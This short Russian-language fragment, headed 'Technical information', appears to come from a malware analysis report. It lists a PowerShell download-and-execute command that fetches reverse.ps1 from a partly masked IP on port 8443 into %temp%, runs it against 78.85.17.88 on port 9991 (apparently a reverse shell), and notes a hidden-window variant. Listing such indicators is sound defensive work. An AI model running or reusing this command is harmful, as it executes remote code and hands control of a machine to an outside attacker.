Техническая информация
- http://78.##.17.88:8443/reverse.ps1 as %temp%\reverse.ps1
- '<SYSTEM32>\cmd.exe' "/c powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://78.##.17.88:8443/reverse.ps1', '%temp%\reverse.ps1') && powershell.exe %temp%\reverse.ps1 78.85.17.88 9991"
- '78.#5.17.88':8443
- '<SYSTEM32>\cmd.exe' "/c powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://78.##.17.88:8443/reverse.ps1', '%temp%\reverse.ps1') && powershell.exe %temp%\reverse.ps1 78.85.17.88 9991"' (со скрытым окном)